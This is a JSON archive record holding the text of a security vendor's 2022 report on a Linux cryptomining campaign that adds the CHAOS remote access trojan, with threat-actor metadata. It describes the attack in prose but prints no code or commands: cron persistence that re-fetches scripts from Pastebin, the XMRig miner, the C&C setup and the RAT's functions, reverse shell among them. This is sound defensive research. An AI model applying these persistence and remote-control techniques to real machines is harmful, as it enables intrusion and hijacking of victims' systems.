{ "id": "88402e4d-c880-4bbe-85cd-fd54bc38a6d8", "created_at": "2026-04-06T00:06:16.13478Z", "updated_at": "2026-04-10T13:12:40.196106Z", "deleted_at": null, "sha1_hash": "3f9a7519b26ef1973f005d4d59806688e4f36b19", "title": "Linux Cryptocurrency Mining Attacks Enhanced via CHAOS RAT", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 205985, "plain_text": "Linux Cryptocurrency Mining Attacks Enhanced via CHAOS RAT\r\nBy By: David Fiser, Alfredo Oliveira Dec 12, 2022 Read time: 3 min (744 words)\r\nPublished: 2022-12-12 · Archived: 2026-04-02 12:25:32 UTC\r\nWe’ve previously written about cryptojacking scenariosnews- cybercrime-and-digital-threats involving Linux\r\nmachines and specific cloud computing instances being targeted by threat actors active in this spacenews-cybercrime-and-digital-threats such as TeamTNT. We found that the routines and chain of events were fairly\r\nsimilar even if it involved different threat actors: the initial phase saw attackers trying to kill off competing\r\nmalware, security products, and other cloud middleware. This was followed by routines for persistence and\r\npayload execution, which in most cases is a Monero (XMR) cryptocurrency miner. For more sophisticated threats,\r\nwe also observed capabilities that allowed it to spread to more devices.\r\nIn November 2022, we intercepted a threat that had a slightly different routine and incorporated an advanced\r\nremote access trojan (RAT) named the CHAOS Remote Administrative Tool (Trojan.Linux.CHAOSRAT), which\r\nis based on an open source project.\r\nNote that the original flow involving the termination of competing malware such as Kinsing and the killing of\r\nresources that influence cryptocurrency mining performance remained unchanged.\r\nThe malware achieves its persistence by altering /etc/crontab file, a UNIX task scheduler that, in this case,\r\ndownloads itself every 10 minutes from Pastebin.\r\nopen on a new tab\r\nFigure 2. Achieving persistence using cron and downloaded shell scripts from Pastebin\r\nThis is followed by downloading additional payloads: an XMRig miner, its configuration file, a shell script\r\nlooping “competition killer,” and most importantly, the RAT itself.\r\nThe main downloader script and further payloads are hosted in different locations to ensure that the campaign\r\nremains active and constantly spreading. The scripts show that the main server, which is also used for\r\ndownloading payloads, appears to be located in Russia, with historical whois data showing that it also used for\r\ncloud bulletproof hosting (a modus operandi that was previously employed by hacking teamsnews- cybercrime-and-digital-threats — using open source tools — that focused their attacks on cloud infrastructure, containers, and\r\nLinux environments).\r\nhttps://www.trendmicro.com/en_us/research/22/l/linux-cryptomining-enhanced-via-chaos-rat-.html\r\nPage 1 of 4\n\nThis command-and-control (C\u0026C) server is used only for providing payloads — Chaos RAT connects to another\r\nC\u0026C server, likely located in Hong Kong (which we determined through IP geolocation). When running, the RAT\r\nclient connects to the C\u0026C server via its address, and default port, using a JSON Web Token (JTW) for\r\nauthorization.\r\nUpon connection and successful authorization, the client sends detailed information on the infected machine to the\r\nC\u0026C server using the command /device.\r\nThe RAT is a Go-compiled binary with the following functions:\r\nPerform reverse shell\r\nDownload files\r\nUpload files\r\nDelete files\r\nTake screenshots\r\nAccess file explorer\r\nGather operating system information\r\nRestart the PC\r\nShutdown the PC\r\nOpen a URL\r\n open on a new tab\r\nhttps://www.trendmicro.com/en_us/research/22/l/linux-cryptomining-enhanced-via-chaos-rat-.html\r\nPage 2 of 4\n\nFigure 5. Some implemented functions that can be sent to communicated machine via the C\u0026C\r\nserver\r\nAn interesting trait of the malware family we intercepted is that the address and access token are passed as\r\ncompilation flags and hardcoded inside the RAT client, replacing any data inside variables from the main code. \r\n open on a new tab\r\nFigure 8. The address and access token being passed as compilation flags and hardcoded inside the\r\nRAT client\r\nConclusion\r\nOn the surface, the incorporation of a RAT into the infection routine of a cryptocurrency mining malware might\r\nseem relatively minor. However, given the tool’s array of functions and the fact that this evolution shows that\r\ncloud-based threat actors are still evolving their campaigns, it is important that both organizations and individuals\r\nstay extra vigilant when it comes to security. In our research on cloud-based cryptocurrency mining groupsnews-cybercrime-and-digital-threats, we provided several concrete measures and best practices that enterprises can\r\nimplement to help strengthen their defensive posture.\r\nOrganizations can also consider powerful cloud security technologies such as Trend Micro Cloud One™ –\r\nWorkload Securityproducts, which  helps defend systems against vulnerability exploits, malware, and\r\nunauthorized change. Using techniques such as machine learning (ML) and virtual patching, it can automatically\r\nsecure new and existing workloads both against known and unknown threats. \r\nIndicators of Compromise\r\nThe indicators of compromise for this entry can be found here.\r\nhttps://www.trendmicro.com/en_us/research/22/l/linux-cryptomining-enhanced-via-chaos-rat-.html\r\nPage 3 of 4\n\nMITRE ATT\u0026CK\r\nTags\r\nSource: https://www.trendmicro.com/en_us/research/22/l/linux-cryptomining-enhanced-via-chaos-rat-.html\r\nhttps://www.trendmicro.com/en_us/research/22/l/linux-cryptomining-enhanced-via-chaos-rat-.html\r\nPage 4 of 4", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "origins": [ "web" ], "references": [ "https://www.trendmicro.com/en_us/research/22/l/linux-cryptomining-enhanced-via-chaos-rat-.html" ], "report_names": [ "linux-cryptomining-enhanced-via-chaos-rat-.html" ], "threat_actors": [ { "id": "eb3f4e4d-2573-494d-9739-1be5141cf7b2", "created_at": "2022-10-25T16:07:24.471018Z", "updated_at": "2026-04-10T02:00:05.002374Z", "deleted_at": null, "main_name": "Cron", "aliases": [], "source_name": "ETDA:Cron", "tools": [ "Catelites", "Catelites Bot", "CronBot", "TinyZBot" ], "source_id": "ETDA", "reports": null }, { "id": "f809bfcb-b200-4988-80a8-be78ef6a52ef", "created_at": "2023-01-06T13:46:39.186988Z", "updated_at": "2026-04-10T02:00:03.240002Z", "deleted_at": null, "main_name": "TeamTNT", "aliases": [ "Adept Libra" ], "source_name": "MISPGALAXY:TeamTNT", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "c3ca592f-0669-49bd-ab5c-310007ab2fb4", "created_at": "2022-10-25T15:50:23.334495Z", "updated_at": "2026-04-10T02:00:05.264841Z", "deleted_at": null, "main_name": "TeamTNT", "aliases": [ "TeamTNT" ], "source_name": "MITRE:TeamTNT", "tools": [ "Peirates", "MimiPenguin", "LaZagne", "Hildegard" ], "source_id": "MITRE", "reports": null }, { "id": "a6c351ea-01f1-4c9b-af75-cfbb3b269ed3", "created_at": "2023-01-06T13:46:39.390649Z", "updated_at": "2026-04-10T02:00:03.311299Z", "deleted_at": null, "main_name": "Kinsing", "aliases": [ "Money Libra" ], "source_name": "MISPGALAXY:Kinsing", "tools": [], "source_id": "MISPGALAXY", "reports": null } ], "ts_created_at": 1775433976, "ts_updated_at": 1775826760, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/3f9a7519b26ef1973f005d4d59806688e4f36b19.pdf", "text": "https://archive.orkl.eu/3f9a7519b26ef1973f005d4d59806688e4f36b19.txt", "img": "https://archive.orkl.eu/3f9a7519b26ef1973f005d4d59806688e4f36b19.jpg" } }